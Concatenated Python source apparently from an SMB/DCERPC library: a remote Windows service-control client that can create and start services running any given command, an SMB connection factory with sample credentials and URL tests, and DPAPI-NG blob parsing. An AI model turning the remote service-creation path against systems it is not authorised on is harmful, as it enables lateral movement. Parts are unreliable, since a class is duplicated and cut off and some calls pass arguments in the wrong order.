import enum
import asyncio
from inspect import trace
import traceback

from aiosmb import logger
from aiosmb.dcerpc.v5.common.service import SMBServiceStatus, SMBService
from aiosmb.dcerpc.v5.common.connection.smbdcefactory import SMBDCEFactory
from aiosmb.connection import SMBConnection
from aiosmb.dcerpc.v5.connection import DCERPC5Connection
from aiosmb.dcerpc.v5 import scmr
from aiosmb.dcerpc.v5.interfaces.endpointmgr import EPM
from aiosmb.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE,\
	RPC_C_AUTHN_LEVEL_CONNECT,\
	RPC_C_AUTHN_LEVEL_CALL,\
	RPC_C_AUTHN_LEVEL_PKT,\
	RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,\
	RPC_C_AUTHN_LEVEL_PKT_PRIVACY,\
	DCERPCException, RPC_C_AUTHN_GSS_NEGOTIATE

class REMSVCRPC:
	def __init__(self):
		self.service_pipename = r'\svcctl'
		self.service_uuid = scmr.MSRPC_UUID_SCMR
		self.dce = None
		self.handle = None
		
		self.service_handles = {} #service_name -> handle
		
	async def __aenter__(self):
		return self
		
	async def __aexit__(self, exc_type, exc, traceback):
		await self.close()
		return True,None
	
	@staticmethod
	async def from_rpcconnection(connection:DCERPC5Connection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		try:
			service = REMSVCRPC()
			service.dce = connection
			
			service.dce.set_auth_level(auth_level)
			if auth_level is None:
				service.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY) #secure default :P 
			
			_, err = await service.dce.connect()
			if err is not None:
				raise err
			
			_, err = await service.dce.bind(service.service_uuid)
			if err is not None:
				raise err
			
			if open is True:
				_, err = await service.open()
				if err is not None:
					raise err
				
			return service, None
		except Exception as e:
			return False, e
	
	@staticmethod
	async def from_smbconnection(connection:SMBConnection, auth_level = None, open:bool = True, perform_dummy:bool = False):
		"""
		Creates the connection to the service using an established SMBConnection.
		This connection will use the given SMBConnection as transport layer.
		"""
		try:
			if auth_level is None:
				#for SMB connection no extra auth needed
				auth_level = RPC_C_AUTHN_LEVEL_NONE
			rpctransport = SMBDCEFactory(connection, filename=REMSVCRPC().service_pipename)		
			service, err = await REMSVCRPC.from_rpcconnection(rpctransport.get_dce_rpc(), auth_level=auth_level, open=open, perform_dummy = perform_dummy)	
			if err is not None:
				raise err

			return service, None
		except Exception as e:
			return None, e
	
	async def open(self):
		try:			
			ans, err = await scmr.hROpenSCManagerW(self.dce)
			if err is not None:
				return False, err
			
			self.handle = ans['lpScHandle']

			return True,None
		except Exception as e:
			return None, e
	
	async def close(self):
		try:
			if self.dce:
				if self.handle:
					for service_name in self.service_handles:
						try:
							await self.close_service(service_name)
						except:
							pass
					try:
						await scmr.hRCloseServiceHandle(self.dce, self.service_handles[service_name])
					except:
						pass
				try:
					await self.dce.disconnect()
				except:
					pass
				return
			
			return True,None
		except Exception as e:
			return None, e

	async def list(self):
		try:
			resp, err = await scmr.hREnumServicesStatusW(self.dce, self.handle)
			if err is not None:
				raise err
			
			for i in range(len(resp)):
				service_status = None
				state = resp[i]['ServiceStatus']['dwCurrentState']
				if state == scmr.SERVICE_CONTINUE_PENDING:
					service_status = SMBServiceStatus.CONTINUE_PENDING
				elif state == scmr.SERVICE_PAUSE_PENDING:
					service_status = SMBServiceStatus.PAUSE_PENDING
				elif state == scmr.SERVICE_PAUSED:
					service_status = SMBServiceStatus.PAUSED
				elif state == scmr.SERVICE_RUNNING:
					service_status = SMBServiceStatus.RUNNING
				elif state == scmr.SERVICE_START_PENDING:
					service_status = SMBServiceStatus.START_PENDING
				elif state == scmr.SERVICE_STOP_PENDING:
					service_status = SMBServiceStatus.STOP_PENDING
				elif state == scmr.SERVICE_STOPPED:
					service_status = SMBServiceStatus.STOPPED
				else:
					service_status = SMBServiceStatus.UNKNOWN

				service = SMBService(resp[i]['lpServiceName'][:-1], resp[i]['lpDisplayName'][:-1], service_status)
				yield service, None
		except Exception as e:
			yield None, e
	
	async def open_service(self, service_name, desired_access = scmr.SERVICE_ALL_ACCESS):
		try:
			if service_name in self.service_handles:
				return False, None
				
			ans, err = await scmr.hROpenServiceW(self.dce, self.handle, service_name, dwDesiredAccess = desired_access)
			if err is not None:
				raise err

			self.service_handles[service_name] = ans['lpServiceHandle']

			return True,None
		except Exception as e:
			return None, e
	
	async def close_service(self, service_name):
		try:
			if not self.handle:
				_, err = await self.open()
				if err is not None:
					raise err
			if service_name not in self.service_handles:
				_, err = await self.open_service(service_name)
				if err is not None:
					raise err
			
			_, err = await scmr.hRCloseServiceHandle(self.dce, self.service_handles[service_name])
			if err is not None:
				raise err
			
			del self.service_handles[service_name]

			return True, None
		except Exception as e:
			return None, e
	
	async def check_service_status(self, service_name):
		try:
			if not self.handle:
				_, err = await self.open()
				if err is not None:
					raise err

			if service_name not in self.service_handles:
				_, err = await self.open_service(service_name)
				if err is not None:
					raise err
			
			ans, err = await scmr.hRQueryServiceStatus(self.dce, self.service_handles[service_name])
			if err is not None:
				raise err
			
			if ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_STOPPED:
				logger.info('Service %s is in stopped state'% service_name)
				
				# Let's check its configuration if service is stopped, maybe it's disabled :s
				ans, err = await scmr.hRQueryServiceConfigW(self.dce, self.service_handles[service_name])
				if err is not None:
					raise err
				if ans['lpServiceConfig']['dwStartType'] == 0x4:
					return SMBServiceStatus.DISABLED, None
				else:
					return SMBServiceStatus.STOPPED, None

			elif ans['lpServiceStatus']['dwCurrentState'] == scmr.SERVICE_RUNNING:
				logger.debug('Service %s is already running'% service_name)
				return SMBServiceStatus.RUNNING, None
			else:
				raise Exception('Unknown service state 0x%x - Aborting' % ans['CurrentState'])
		except Exception as e:
			return None, e
	
	async def stop_service(self, service_name):
		try:
			_, err = await self.change_service_status(service_name, scmr.SERVICE_CONTROL_STOP)
			if err is not None:
				raise err
			return True, None
		except Exception as e:
			return None, e

	async def change_service_status(self, service_name, service_status):
		try:
			if not self.handle:
				_, err = await self.open()
				if err is not None:
					raise err

			if service_name not in self.service_handles:
				desired_access = scmr.SERVICE_ALL_ACCESS
				if service_status == scmr.SERVICE_CONTROL_STOP:
					desired_access = scmr.SERVICE_STOP
				_, err = await self.open_service(service_name, desired_access)
				if err is not None:
					raise err
			
			_, err = await scmr.hRControlService(self.dce, self.handle, service_status)
			if err is not None:
				raise err
			
			return True, None
		except Exception as e:
			return None, e
	
	async def create_service(self, service_name, display_name, command, starttype = scmr.SERVICE_AUTO_START):
		try:
			if not self.handle:
				_, err = await self.open()
				if err is not None:
					raise err

			resp, err = await scmr.hRCreateServiceW(self.dce, self.handle, service_name + '\x00', display_name + '\x00', lpBinaryPathName=command + '\x00', dwStartType=starttype)
			if err is not None:
				raise err
			self.service_handles[service_name] = resp['lpServiceHandle']
			return resp, err
		except Exception as e:
			return None, e
	
	async def delete_service(self, service_name):
		try:
			if not self.handle:
				_, err = await self.open()
				if err is not None:
					raise err

			if service_name not in self.service_handles:
				_, err = await self.open_service(service_name)
				if err is not None:
					raise err
			
			_, err = await scmr.hRDeleteService(self.dce, self.service_handles[service_name])
			if err is not None:
				raise err
			return True, None
		except Exception as e:
			return None, e
	

	async def start_service(self, service_name):
		try:
			if not self.handle:
				_, err = await self.open()
				if err is not None:
					raise err

			if service_name not in self.service_handles:
				_, err = await self.open_service(service_name)
				if err is not None:
					raise err

			_, err = await scmr.hRStartServiceW(self.dce, self.service_handles[service_name])
			if err is not None:
				raise err
				
			await asyncio.sleep(1) #service takes time to start up...
			return True,None
		except Exception as e:
			return None, e
	
	async def enable_service(self, service_name):
		try:
			if not self.handle:
				_, err = await self.open()
				if err is not None:
					raise err

			if service_name not in self.service_handles:
				_, err = await self.open_service(service_name)
				if err is not None:
					raise err
				
			_, err = await scmr.hRChangeServiceConfigW(self.dce, self.service_handles[service_name], dwStartType=scmr.SERVICE_AUTO_START)
			if err is not None:
				raise err

			return True,None
		except Exception as e:
			return None, e



import asyncio
from asysocks.unicomm.client import UniClient
from asysocks.unicomm.common.packetizers import Packetizer
from aiosmb.dcerpc.v5.rpcrt import MSRPCRespHeader

class DCERPCPacketizer(Packetizer):
	def __init__(self, buffer_size = 65535):
		Packetizer.__init__(self, buffer_size)
		self.buffer_size = buffer_size
		self.in_buffer = b''
	
	def process_buffer(self):
		while len(self.in_buffer) >= 24:
			response_header = MSRPCRespHeader(self.in_buffer)
			if len(self.in_buffer) >= response_header['frag_len']:
				msg_data = self.in_buffer[:response_header['frag_len']]
				self.in_buffer = self.in_buffer[response_header['frag_len']:]
				yield msg_data
				continue
			break

	async def data_out(self, data):
		if len(data) > self.buffer_size:
			offset = 0
			while True:
				toSend = data[offset:offset+self.buffer_size]
				if not toSend:
					break
				yield toSend
				offset += len(toSend)
		else:
			yield data

	async def data_in(self, data):
		if data is None:
			yield data
		self.in_buffer += data
		for packet in self.process_buffer():
			yield packet
		

class DCERPCTCPTransport:
	def __init__(self, target):
		self.target = target
		self.client = None
		self.connection = None
		self.reader_task = None

		self.packets = asyncio.Queue()
	
	async def disconnect(self):
		try:
			if self.reader_task is not None:
				self.reader_task.cancel()

			if self.connection is not None:
				await self.connection.close()
				
		except Exception as e:
			return None, e

	async def __reader(self):
		try:
			async for data in self.connection.read():
				await self.packets.put(data)
		except asyncio.CancelledError:
			return

	async def send(self, data, forceWriteAndx = 0, forceRecv = 0):
		try:
			await self.connection.write(data)
			return None, None
		except Exception as e:
			return False, e

	async def recv(self, x):
		try:
			data = await self.packets.get()
			return data, None
		except Exception as e:
			return None, e

	async def connect(self):
		packetizer = DCERPCPacketizer()
		client = UniClient(self.target, packetizer)
		self.connection = await client.connect()
		self.reader_task = asyncio.create_task(self.__reader())



import enum
from aiosmb.commons.interfaces.file import SMBFile
from aiosmb.commons.interfaces.directory import SMBDirectory
from aiosmb.commons.connection.target import SMBTarget, SMBConnectionDialect
from aiosmb.connection import SMBConnection
import ipaddress
import copy
from typing import List

from asyauth.common.credentials import UniCredential
from asyauth.common.constants import asyauthSecret
from asyauth.common.credentials.spnego import SPNEGOCredential

class SMBConnectionFactory:
	def __init__(self, credential:UniCredential = None, target:SMBTarget = None):
		self.credential = credential
		self.target = target
		self.proxies= None
	
	@staticmethod
	def from_url(connection_url):
		"""Creates SMBConnectionFactory from url string"""
		target = SMBTarget.from_url(connection_url)
		credential = UniCredential.from_url(connection_url)
		return SMBConnectionFactory(credential, target)

	def get_connection(self):
		"""Creates a new SMBConnection object"""
		spneg = self.get_credential()
		target = self.get_target()
		
		return SMBConnection(spneg, target)

	def create_connection_newtarget(self, ip_or_hostname):
		"""Creates a new SMBConnection object with a new target. 
		Credentials are copied from the original connection factory
		Target parameters will remain the same as the original, 
		but is set to the ip_or_hostname parameter"""
		spneg = self.get_credential()
		#credential.target = ip_or_hostname
		target = self.get_target()

		try:
			ipaddress.ip_address(ip_or_hostname)
			target.ip = ip_or_hostname
			target.hostname = None
		except:
			target.hostname = ip_or_hostname
			target.ip = ip_or_hostname
		
		return SMBConnection(spneg, target)

	def get_file(self):
		"""Creates a new SMBFile object using the path from the URL string, or the Target object"""
		return SMBFile.from_smbtarget(self.get_target())
	
	def get_directory(self):
		"""Creates a new SMBDirectory object using the path from the URL string, or the Target object"""
		return SMBDirectory.from_smbtarget(self.get_target())

	def get_proxies(self):
		"""Returns a copy of proxies from the target object"""
		return copy.deepcopy(self.target.proxies)

	def get_target(self):
		"""Returns a copy of the target object"""
		return copy.deepcopy(self.target)

	def get_credential(self):
		"""Returns a new SPNEGOCredential object with the credential from the factory"""
		return SPNEGOCredential([copy.deepcopy(self.credential)]).build_context()
	
	@staticmethod
	def from_components(ip_or_hostname:str, username:str, secret:str, secrettype:str = 'password', 
							domain:str = None, port:str = 445, dialect:str = 'smb', dcip:str = None, proxies = None, authproto:str = 'ntlm',
							altname:str = None, altdomain:str = None, etype:List[int]=[23,17,18], certdata:str= None, keydata:str=None):
		"""Builds a new SMBConnectionFactory object from scratch.
		This doesn't support all features of the SMBTarget and SMBCredential objects, but it's a quick way to build a connection factory."""
		import ipaddress
		if username.count('\\') == 1:
			domain, username = username.split('\\')
		if domain is not None:
			domain = domain.upper()
		
		ip = None
		hostname = None
		try:
			ipaddress.ip_address(ip_or_hostname)
			ip = ip_or_hostname
			hostname = None
		except:
			ip = None
			hostname = ip_or_hostname
		
		# build a target
		target = SMBTarget(ip, port, hostname, dc_ip=dcip, domain=domain, proxies=copy.deepcopy(proxies))
		target.update_dialect(SMBConnectionDialect(dialect.upper()))


		authproto = authproto.upper()
		secrettype = asyauthSecret(secrettype.upper())
		if authproto == 'NTLM':
			from asyauth.common.credentials.ntlm import NTLMCredential
			credential = NTLMCredential(
				secret,
				username, 
				domain, 
				secrettype, 
			)
		elif authproto == 'KERBEROS':
			from asyauth.common.credentials.kerberos import KerberosCredential
			credential = KerberosCredential(
				secret,
				username,
				domain,
				secrettype, 
				target = target,
				altname=altname,
				altdomain=altdomain,
				etype=[23,17,18],
				certdata=certdata,
				keydata=keydata,
			)
		
		else:
			raise Exception('Unknown authproto: %s' % authproto)

		return SMBConnectionFactory(target, credential)
	
	def __str__(self):
		t = '==== SMBConnectionFactory ====\r\n'
		for k in self.__dict__:
			val = self.__dict__[k]
			if isinstance(val, enum.IntFlag):
				val = val
			elif isinstance(val, enum.Enum):
				val = val.name
			
			t += '%s: %s\r\n' % (k, str(val))
			
		return t
			
if __name__ == '__main__':
	user = 'TEST\\victim'
	password = 'Passw0rd!1'
	domain = 'TEST'
	ip = '10.10.10.2'
	port = 445
	dialect = 'smb'
	secrettype = 'password'
	authproto = 'ntlm'

	factory = SMBConnectionFactory.from_components(
		ip,
		user,
		password,
		secrettype,
		domain,
		port,
		dialect		
	)

	from aiosmb.commons.interfaces.file import SMBFile
	url_tests = [
		'smb://10.10.10.2',
		'smb://10.10.10.2:9000',
		'smb3://10.10.10.2:9000',
		'smb-tcp://10.10.10.2',
		'smb-tcp://10.10.10.2:9000',
		'smb-udp://10.10.10.2:138',
		'smb+ntlm-password://domain\\user@10.10.10.2',
		'smb-tcp+ntlm-password://domain\\user:password@10.10.10.2',
		'smb-tcp+ntlm-password://domain\\user:password@10.10.10.2:10000',
		'smb-tcp+ntlm-nt://domain\\user:alma@10.10.10.2',
		'smb+ntlm-nt://domain\\user:alma@10.10.10.2',
		'smb+ntlm-nt://domain\\user:alma@10.10.10.2',
		'smb-tcp+kerberos-password://domain\\alma:password@10.10.10.10.2',
		'smb-tcp+kerberos-aes://domain\\alma:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa@10.10.10.10.2',
		'smb-tcp+kerberos-aes://domain\\alma:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa@10.10.10.10.2',
		'smb-tcp+kerberos-nt://domain\\alma:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa@10.10.10.10.2',
		'smb-tcp+kerberos-rc4://domain\\alma:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa@10.10.10.10.2',
		#'smb+sspi://10.10.10.10.2',
		'smb+sspi-ntlm://10.10.10.10.2',
		'smb+sspi-kerberos://10.10.10.10.2',
		'smb://10.10.10.2/?timeout=10',
		'smb://10.10.10.2/?timeout=10&dc=10.10.10.2',
		'smb://10.10.10.2/?timeout=10&dc=10.10.10.2&proxytype=socks5',
		'smb://10.10.10.2/?timeout=10&dc=10.10.10.2&proxytype=socks5&proxyhost=127.0.0.1',
		'smb://10.10.10.2/?timeout=10&dc=10.10.10.2&proxytype=socks5&proxyhost=127.0.0.1&proxyuser=admin&proxypass=alma',
		'smb://10.10.10.2/?timeout=10&dc=10.10.10.2&proxytype=socks5&proxyhost=127.0.0.1&proxyuser=admin&proxypass=alma&dc=10.10.10.2&dns=8.8.8.8',
		'smb://10.10.10.2/?timeout=10&dc=10.10.10.2&proxytype=socks5s&proxyhost=127.0.0.1&proxyuser=admin&proxypass=alma&dc=10.10.10.2&dns=8.8.8.8',
	]
	for url in url_tests:
		print('===========================================================================')
		print(url)
		try:
			dec = SMBConnectionFactory.from_url(url)
			creds = dec.get_credential()
			target = dec.get_target()
			smbfile = dec.get_file()
			print(smbfile)
		except Exception as e:
			import traceback
			traceback.print_exc()
			print('ERROR! Reason: %s' % e)
			input()
		else:
			print(str(creds))
			print(str(target))
			input()
			
			




from __future__ import annotations
from __future__ import division
from __future__ import print_function
from aiosmb.dcerpc.v5.ndr import NDRCALL, NDRPOINTER, NDRUniConformantArray
from aiosmb.dcerpc.v5.dtypes import DWORD, NTSTATUS, GUID, RPC_SID, NULL, PGUID, ULONG, LONG, PWCHAR, PULONG
from aiosmb.dcerpc.v5.rpcrt import DCERPCException
from aiosmb.dcerpc.v5 import system_errors
from aiosmb.dcerpc.v5 import hresult_errors
from aiosmb.dcerpc.v5.uuid import uuidtup_to_bin, string_to_bin
from aiosmb.dcerpc.v5.structure import Structure
import uuid
import os
import enum
import dataclasses
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
import typing as t
import math
from cryptography.hazmat.primitives import hashes, keywrap
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.primitives.kdf.concatkdf import ConcatKDFHash
from cryptography.hazmat.primitives.kdf.kbkdf import KBKDFHMAC, CounterLocation, Mode
from asn1crypto import cms

from winacl.dtyp.security_descriptor import SECURITY_DESCRIPTOR, SE_SACL
from winacl.dtyp.sid import SID
from winacl.dtyp.ace import ACCESS_ALLOWED_ACE
from winacl.dtyp.acl import ACL
from asn1crypto.cms import ContentInfo
import io


# https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-gkdi/943dd4f6-6b80-4a66-8594-80df6d2aad0a
MSRPC_UUID_GKDI = uuidtup_to_bin(('b9785960-524f-11df-8b6d-83dcded72085', '1.0'))


class DCERPCSessionError(DCERPCException):
	def __init__(self, error_string=None, error_code=None, packet=None):
		DCERPCException.__init__(self, error_string, error_code, packet)

	def __str__( self ):
		key = self.error_code
		if key in hresult_errors.ERROR_MESSAGES:
			error_msg_short = hresult_errors.ERROR_MESSAGES[key][0]
			error_msg_verbose = hresult_errors.ERROR_MESSAGES[key][1]
			return 'GKDI SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
		elif key & 0xffff in system_errors.ERROR_MESSAGES:
			error_msg_short = system_errors.ERROR_MESSAGES[key & 0xffff][0]
			error_msg_verbose = system_errors.ERROR_MESSAGES[key & 0xffff][1]
			return 'GKDI SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
		return 'GKDI SessionError: unknown error code: 0x%x' % self.error_code

################################################################################
# STRUCTURES
################################################################################
class BYTE_ARRAY(NDRUniConformantArray):
	item = 'c'

class PBYTE_ARRAY(NDRPOINTER):
	referent = (
		('Data', BYTE_ARRAY),
	)





KDS_SERVICE_LABEL = "KDS service\0".encode("utf-16-le")

@dataclasses.dataclass(frozen=True)
class KeyIdentifier:
	"""Key Identifier.

	This contains the key identifier info that can be used by MS-GKDI GetKey
	to retrieve the group key seed values. This structure is not defined
	publicly by Microsoft but it closely matches the :class:`GroupKeyEnvelope`
	structure.

	Args:
		version: The version of the structure, should be 1
		flags: Flags describing the values inside the structure
		l0: The L0 index of the key
		l1: The L1 index of the key
		l2: The L2 index of the key
		root_key_identifier: The key identifier
		key_info: If is_public_key this is the public key, else it is the key
			KDF context value.
		domain_name: The domain name of the server in DNS format.
		forest_name: The forest name of the server in DNS format.
	"""

	version: int
	magic: bytes = dataclasses.field(init=False, repr=False, default=b"\x4B\x44\x53\x4B")
	flags: int
	l0: int
	l1: int
	l2: int
	root_key_identifier: uuid.UUID
	key_info: bytes
	domain_name: str
	forest_name: str

	@property
	def is_public_key(self) -> bool:
		return bool(self.flags & 1)

	def pack(self) -> bytes:
		b_domain_name = (self.domain_name + "\00").encode("utf-16-le")
		b_forest_name = (self.forest_name + "\00").encode("utf-16-le")

		return b"".join(
			[
				self.version.to_bytes(4, byteorder="little"),
				self.magic,
				self.flags.to_bytes(4, byteorder="little"),
				self.l0.to_bytes(4, byteorder="little"),
				self.l1.to_bytes(4, byteorder="little"),
				self.l2.to_bytes(4, byteorder="little"),
				self.root_key_identifier.bytes_le,
				len(self.key_info).to_bytes(4, byteorder="little"),
				len(b_domain_name).to_bytes(4, byteorder="little"),
				len(b_forest_name).to_bytes(4, byteorder="little"),
				self.key_info,
				b_domain_name,
				b_forest_name,
			]
		)

	@classmethod
	def unpack(
		cls,
		data: t.Union[bytes, bytearray, memoryview],
	) -> KeyIdentifier:
		view = memoryview(data)

		version = int.from_bytes(view[:4], byteorder="little")

		if view[4:8].tobytes() != cls.magic:
			raise ValueError(f"Failed to unpack {cls.__name__} as magic identifier is invalid")

		flags = int.from_bytes(view[8:12], byteorder="little")
		l0_index = int.from_bytes(view[12:16], byteorder="little")
		l1_index = int.from_bytes(view[16:20], byteorder="little")
		l2_index = int.from_bytes(view[20:24], byteorder="little")
		root_key_identifier = uuid.UUID(bytes_le=view[24:40].tobytes())
		key_info_len = int.from_bytes(view[40:44], byteorder="little")
		domain_len = int.from_bytes(view[44:48], byteorder="little")
		forest_len = int.from_bytes(view[48:52], byteorder="little")
		view = view[52:]

		key_info = view[:key_info_len].tobytes()
		view = view[key_info_len:]

		# Take away 2 for the final null padding
		domain = view[: domain_len - 2].tobytes().decode("utf-16-le")
		view = view[domain_len:]

		forest = view[: forest_len - 2].tobytes().decode("utf-16-le")
		view = view[forest_len:]

		return KeyIdentifier(
			version=version,
			flags=flags,
			l0=l0_index,
			l1=l1_index,
			l2=l2_index,
			root_key_identifier=root_key_identifier,
			key_info=key_info,
			domain_name=domain,
			forest_name=forest,
		)


class ProtectionDescriptorType(enum.Enum):
	SID = "1.3.6.1.4.1.311.74.1.1"
	KEY_FILE = "1.3.6.1.4.1.311.74.1.2"  # KeyFile in UF8String type
	SDDL = "1.3.6.1.4.1.311.74.1.5"
	LOCAL = "1.3.6.1.4.1.311.74.1.8"


@dataclasses.dataclass(frozen=True)
class ProtectionDescriptor:
	type: ProtectionDescriptorType
	value: str

	def get_target_sd(self) -> bytes:
		raise NotImplementedError()  # pragma: nocover

	def pack(self) -> bytes:
		raise NotImplementedError()  # pragma: nocover

	@classmethod
	def parse(
		cls,
		value: str,
	) -> ProtectionDescriptor:
		# Currently only the SID type is supported
		return SIDDescriptor(value)

	@classmethod
	def unpack(
		cls,
		data: t.Union[bytes, bytearray, memoryview],
	) -> ProtectionDescriptor:
		content_type = data['0']
		value_type = data['1']['0']['0']['0']
		value = data['1']['0']['0']['1']

		if content_type == ProtectionDescriptorType.SID.value and value_type == "SID":
			return SIDDescriptor(value)

		else:
			raise ValueError(f"DPAPI-NG protection descriptor type {content_type} '{value_type}' is unsupported")


@dataclasses.dataclass(frozen=True)
class SIDDescriptor(ProtectionDescriptor):
	type: ProtectionDescriptorType = dataclasses.field(init=False, default=ProtectionDescriptorType.SID)

	def get_target_sd(self) -> bytes:
		# Build the target security descriptor from the SID passed in. This SD
		# contains an ACE per target user with a mask of 0x3 and a final ACE of
		# the current user with a mask of 0x2. When viewing this over the wire
		# the current user is set as S-1-1-0 (World) and the owner/group is
		# S-1-5-18 (SYSTEM).
		a1 = ACCESS_ALLOWED_ACE()
		a1.AceFlags = 0x00
		a1.Mask = 3
		a1.Sid = SID.from_string(self.value)

		a2 = ACCESS_ALLOWED_ACE()
		a2.AceFlags = 0x00
		a2.Mask = 2
		a2.Sid = SID.from_string('S-1-1-0')

		aces = [a1, a2]
		test = SECURITY_DESCRIPTOR()
		test.Owner = SID.from_string('S-1-5-18')
		test.Group = SID.from_string('S-1-5-18')
		test.Control = SE_SACL.SE_DACL_PRESENT | SE_SACL.SE_SELF_RELATIVE
		test.Dacl = ACL()
		test.Dacl.AclRevision = 0x02
		test.Dacl.aces = aces

		targetSD = test.to_bytes()
		return targetSD


@dataclasses.dataclass
class DPAPINGBlob:
	MICROSOFT_SOFTWARE_OID = "1.3.6.1.4.1.311.74.1"

	"""DPAPI NG Blob.

	The unpacked DPAPI NG blob that contains the information needed to decrypt
	the encrypted content. The key identifier and protection descriptor can be
	used to generate the KEK. The KEK is used to decrypt the encrypted CEK. The
	CEK can be used to decrypt the encrypted contents.

	Args:
		key_identifier: The key identifier for the KEK.
		protection_descriptor: The protection descriptor that protects the key.
		enc_cek: The encrypted CEK.
		enc_cek_algorithm: The encrypted CEK algorithm OID.
		enc_cek_parameters: The encrypted CEK algorithm parameters.
		enc_content: The encrypted content.
		enc_content_algorithm: The encrypted content algorithm OID.
		enc_content_parameters: The encrypted content parameters.
	"""

	key_identifier: KeyIdentifier
	protection_descriptor: ProtectionDescriptor
	enc_cek: bytes
	enc_cek_algorithm: str
	enc_cek_parameters: t.Optional[bytes]
	enc_content: bytes
	enc_content_algorithm: str
	enc_content_parameters: t.Optional[bytes]

	def pack() -> bytes:
		raise NotImplementedError()

	@classmethod
	def unpack(
		cls,
		data: t.Union[bytes, bytearray, memoryview],
	) -> DPAPINGBlob:
		view = io.BytesIO(data)
		
		
		update_timestamp = int.from_bytes(view.read(8), byteorder='little', signed=False)
		blob_length = int.from_bytes(view.read(4), byteorder='little', signed=False)
		flags = int.from_bytes(view.read(4), byteorder='little', signed=False)
		blob = view.read(blob_length)
		content_info = ContentInfo.load(blob)
		content_info_native = content_info.native

		if 'content_type' not in content_info_native:
			raise ValueError("Invalid DPAPI-NG blob, missing content type")
		if content_info_native['content_type'] != 'enveloped_data':
			raise ValueError(f"Invalid DPAPI-NG blob, unsupported content type: {content_info_native['content_type']}")
		
		print(content_info_native)
		enveloped_data = content_info_native['content']
		if enveloped_data['version'] != 'v2':
			raise ValueError(f"Invalid DPAPI-NG blob, unsupported version: {enveloped_data['version']}")
		if len(enveloped_data['recipient_infos']) != 1:
			raise ValueError(f"Invalid DPAPI-NG blob, unsupported recipient infos length: {len(enveloped_data['recipient_infos'])}")
		recipient_info = enveloped_data['recipient_infos'][0]
		if recipient_info['version'] != 'v4':
			raise ValueError(f"Invalid DPAPI-NG blob, unsupported recipient info version: {recipient_info['version']}")

		kek_info = recipient_info
		key_identifier = KeyIdentifier.unpack(kek_info['kekid']['key_identifier'])

		if 'other' in kek_info['kekid']:
			if kek_info['kekid']['other']['key_attr_id'] != DPAPINGBlob.MICROSOFT_SOFTWARE_OID:
				raise ValueError("DPAPI-NG KEK Id is not in the expected format")

			protection_descriptor = ProtectionDescriptor.unpack(kek_info['kekid']['other']['key_attr'])

		else:
			protection_descriptor = ProtectionDescriptor.unpack(b'')

		# Some DPAPI blobs don't include the content in the PKCS7 payload but
		# just append after the blob.
		enc_content = enveloped_data['encrypted_content_info']['encrypted_content']
		if enc_content is None:
			view.seek(16+len(content_info.dump()), io.SEEK_SET)
			enc_content = view.read()

		return DPAPINGBlob(
			key_identifier=key_identifier,
			protection_descriptor=protection_descriptor,
			enc_cek=kek_info['encrypted_key'],
			enc_cek_algorithm=kek_info['key_encryption_algorithm']['algorithm'],
			enc_cek_parameters=kek_info['key_encryption_algorithm']['parameters'],
			enc_content=enc_content,
			enc_content_algorithm=enveloped_data['encrypted_content_info']['content_encryption_algorithm']['algorithm'],
			enc_content_parameters=enveloped_data['encrypted_content_info']['content_encryption_algorithm']['parameters'],
		)






























































@dataclasses.dataclass(frozen=True)
class KeyIdentifier:
	"""Key Identifier.

	This contains the key identifier info that can be used by MS-GKDI GetKey
	to retrieve the group key seed values. This structure is not defined
	publicly by Microsoft but it closely matches the :class:`GroupKeyEnvelope`
	structure.

	Args:
		version: The version of the structure, should be 1
		flags: Flags describing the values inside the structure
		l0: The L0 index of the key
		l1: The L1 index of the key
		l2: The L2 index of the key
		root_key_identifier: The key identifier
		key_info: If is_public_key this is the public key, else it is the key
			KDF context value.
		domain_name: The domain name of the server in DNS format.
		forest_name: The forest name of the server in DNS format.
	"""

	version: int
	magic: bytes = dataclasses.field(init=False, repr=False, default=b"\x4B\x44\x53\x4B")
	flags: int
	l0: int
	l1: int
	l2: int
	root_key_identifier: uuid.UUID
	key_info: bytes
	domain_name: str
	forest_name: str

	@property
	def is_public_key(self) -> bool:
		return bool(self.flags & 1)

	def pack(self) -> bytes:
		b_domain_name = (self.domain_name + "\00").encode("utf-16-le")
		b_forest_name = (self.forest_name + "\00").encode("utf-16-le")

		return b"".join(
			[
				self.version.to_bytes(4, byteorder="little"),
				self.magic,
				self.flags.to_bytes(4, byteorder="little"),
				self.l0.to_bytes(4, byteorder="little"),
				self.l1.to_bytes(4, byteorder="little"),
				self.l2.to_bytes(4, byteorder="little"),
				self.root_key_identifier.bytes_le,
				len(self.key_info).to_bytes(4, byteorder="little"),
				len(b_domain_name).to_bytes(4, byteorder="little"),
				len(b_forest_name).to_bytes(4, byteorder="little"),
				self.key_info,
				b_domain_name,
				b_forest_name,
			]
		)

	@classmethod
	def unpack(
		cls,
		data: t.Union[bytes, bytearray, memoryview],
	) -> KeyIdentifier:
		view = memoryview(data)

		version = int.from_bytes(view[:4], byteorder="little")

		if view[4:8].tobytes() != cls.magic:
			raise ValueError(f"Failed to unpack {cls.__name__} as magic identifier is invalid")

		flags = int.from_bytes(view[8:12], byteorder="little")
		l0_index = int.from_bytes(view[12:16], byteorder="little")
		l1_index = int.from_bytes(view[16:20], byteorder="little")
		l2_index = int.from_bytes(view[20:24], byteorder="little")
		root_key_identifier = uuid.UUID(bytes_le=view[24:40].tobytes())
		key_info_len = int.from_bytes(view[40:44], byteorder="little")
		domain_len = int.from_bytes(view[44:48], byteorder="little")
		forest_len = int.from_bytes(view[48:52], byteorder="little")
		view = view[52:]

		key_info = view[:key_info_len].tobytes()
		view = view[key_info_len:]

